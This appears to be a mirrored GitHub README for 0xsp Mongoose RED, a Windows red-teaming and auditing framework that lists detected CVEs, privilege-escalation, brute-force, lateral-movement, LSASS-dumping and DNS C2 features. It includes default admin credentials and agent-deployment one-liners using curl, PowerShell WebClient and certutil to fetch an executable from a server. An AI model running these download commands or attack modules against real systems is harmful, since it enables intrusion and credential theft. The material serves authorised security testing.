项目作者: lawrenceamer

项目描述 :
a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.
高级语言: Pascal
项目地址: git://github.com/lawrenceamer/0xsp-Mongoose.git
创建时间: 2019-06-12T20:12:16Z
项目社区:https://github.com/lawrenceamer/0xsp-Mongoose

开源协议:GNU General Public License v3.0

下载


GPLv3 license




Support the project for continuous development (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED for Windows

Current Release 2.2.0

0xsp mongoose red version is provided to assist your needs during cyber security simulation, by using this version you will be able to audit a targeted windows operation system
for system vulnerabilities, misconfigurations and privilege escalation attacks and replicate the tactics and techniques of an advanced adversary in a network.

with node js support for web application API, it becomes much easier for installation and customization in timely manner, the windows sensor agent will communicate with application API to transfer results, and receive commands as bidirectional technique.

the agent is able to identify and detect windows exploits by using windows update api and exploit database definitions modules, the new release will detect also the following
vulnerabilities.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Features

  • Windows Privilege escalation scanning techniques.
  • web application built with NodeJS
  • supports sqlite DB
  • Lateral movements techniques. video
  • Bidirectional communication channel. video
  • Plugins online packaging.
  • Enhanced exploit detecter scripting engine.
  • Windows Account Bruteforce Module (Local / Domain)
  • weaponization of run-as-user windows api function. Video
  • local network scanning and shares enumeration.
  • lsass memory dummping technique (plugin).
  • DNS C2C interactive shellmode

installation

  1. git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
  2. cd 0xsp-mongoose/
  3. npm install
  4. node index.js

default access credentials :

  • username : admin
  • password : 0xsp

DNS C2C python script

  1. touch temp.txt
  2. python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

quick deploy of agent

  1. #example 1
  2. curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
  3. #example 2
  4. powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
  5. #example 3
  6. certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Usage

  1. -s --retrieve windows services and installed drivers.
  2. -u --retrieve information about Users, groups, roles.
  3. -c --search connected drivers for senstive config files by extension.
  4. -n --retrieve network information,network interfaces, connection details.
  5. -w --enumerate for writeable directories, access permission Check, modified permissions.
  6. -i --enumerate windows system information, Sessions, Always elvated check.
  7. -l --search in any file for specific string , ex : agent.exe -l c:\ password *.config.
  8. -o --specify host address of nodejs application , you can use srvhost also
  9. -p --enumerate installed Softwares, Running Processes, Tasks.
  10. -e --kernel inspection Tool, it will help to search through tool databases for windows kernel vulnerabilities
  11. -x --password to authorize your connection with node js application.
  12. -d --download Files directly into target machine.
  13. -t --upload Files From target machine into node js application.
  14. -spooler --scan single host or list of hosts for possible CVE-2021-1675 (e.g -spooler -srvhost or -spooler -hosts )
  15. -m --run all known scan Types together.
  16. [!] RED TEAMING TACTICS SECTION
  17. -r --spawn a reverse shell with specific account.
  18. -lr --Lateral movement technique using WMI (e.g -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
  19. -nds --network discovery and share enumeration
  20. -dns --establish interactive dns C2C shell
  21. -cmd --transfer commands via HTTP Shell
  22. -interactive --starting interactive mode (eg : loading plugins ..etc)
  23. -username --identity authentication for specific attack modules.
  24. -password --identity authentication for specific attack modules.
  25. -host --identify remote host to conduct an attack to.
  26. -srvhost --set rhost of node js application.
  27. -bf --local users / domain users bruteforce module
  28. -import --import and execute dll file locally
  29. -remote --import and execute dll file from remote host

Documentations

https://0xsp.com/security%20dev/0xsp-mongoose-red

detailed research site

https://0xsp.com

Security Conferences

tool tutorials

make sure to subscribe into the following channel to be notified when new tutorial and tricks published for 0xsp
https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg